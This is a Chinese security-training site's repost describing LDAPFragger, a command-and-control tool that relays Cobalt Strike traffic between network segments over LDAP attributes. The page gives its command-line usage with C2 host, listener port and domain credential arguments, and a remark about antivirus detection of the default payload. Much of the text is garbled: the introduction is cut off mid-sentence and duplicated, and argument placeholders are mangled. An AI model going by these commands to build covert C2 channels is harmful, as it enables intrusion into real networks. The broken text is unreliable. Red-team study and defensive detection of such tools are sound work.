位置:首页 > 安全分类 > WEB安全

LDAPFragger:一款功能强大的命令控制C&C工具

  • 2022-05-28 15:18:14
WEB安全防御   网络安全培训 网络攻防课 WEB安全工程师 渗透测试
简介 关于LDAPFraggerLDAPFragger是一款功能强大的命令控制CCobalt Strike IP> --csport External listener port>

?

LDAPFragger --cshost Cobalt Strike IP> --csport Extern

关于LDAPFragger

LDAPFragger是一款功能强大的命令控制CCobalt Strike IP> --csport External listener port> ? LDAPFragger --cshost Cobalt Strike IP> --csport External listener port> -u username> -p password> -d domain FQDN>

从网段B运行下列命令:

LDAPFragger

?

LDAPFragger -u username> -p password> -d domain FQDN>

我们可以通过“--LDAPS”选项来启用LDAPS,此时常规的LDAP流量仍然会被加密。注意,此时默认的Cobalt?Strike?Payload可能会被大多数AV捕捉到。

工具运行截图

许可证协议

本项目的开发与发布遵循MIT开源许可证协议。

项目地址

LDAPFragger:GitHub传送门

参考资料

https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/

https://docs.microsoft.com/en-us/windows/win32/adschema/r-personal-information

https://github.com/fox-it/LDAPFragger/blob/master/LDAPChannel.ps1

https://www.harmj0y.net/blog/powershell/command-and-control-using-active-directory/

https://www.cobaltstrike.com/help-externalc2

https://support.microsoft.com/en-us/help/314980/how-to-configure-active-directory-and-lds-diagnostic-event-logging

https://techcommunity.microsoft.com/t5/Microsoft-Defender-ATP/Hunting-for-reconnaissance-activities-using-LDAP-search-filters/ba-p/824726

很赞哦! (119)

上一篇:武汉网络安全培训怎么选机构

下一篇:大专想要拿高薪就去网络安全培训

相关文章

网盾科技
网盾网络安全培训学校 网盾网络安全培训学校,课程内容紧跟互联网安全技术发展与企业实际用人需求,不断升级更新。 学员可以深入接触web安全基础、漏洞分析、安全测试、渗透测试等全栈解决方案,掌握网络安全分析及解决方案,成长为真正的网络安全人才。
关于我们 | 联系我们 | 师资团队 网盾网络安全学院 CTF靶场
  • 网盾云平台
    • Copyright©1999- 武汉网盾科技有限公司。网盾网络安全培训学校 .All Rights Reserved 鄂ICP备2023003462号-17